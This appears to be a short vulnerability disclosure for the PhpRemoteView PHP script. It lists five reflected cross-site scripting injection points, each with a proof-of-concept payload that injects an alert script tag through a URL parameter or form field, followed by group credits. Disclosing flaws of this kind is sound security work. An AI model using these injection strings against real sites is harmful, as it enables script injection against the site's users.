---------------------------------------------

PhpRemoteView Multiple Xss Vulnerabilities

---------------------------------------------

Site:

http://php.spb.ru/remview/

Bug:

1- http://victim/path/PRV.php?&c=v&d=[path]&f="><script>alert(/Soot/)</scri
pt>

2- http://victim/path/PRV.php?c=l&d="><script>alert(/Soot/)</script>

3-

http://victim/path/PRV.php?c=setup&ref="><script>alert(/Soot/)</script>

4-http://victim/path/PRV.php?c=d&d=[path]

MAKE DIR (type full path) : "><script>alert(/Soot/)</script>

5-http://victim/path/PRV.php?c=d&d=[path]

Full file name : "><script>alert(/Soot/)</script>

---------------------------------------------

Source :

http://soot.shabgard.org/bugs/phpremoteview.txt

Credit :

Soot

Shabgard Security Team

http://www.shabgard.org

Greetz :

Hregy,Elite,Bl2k,Littlehacker

---------------------------------------------

[ reply ]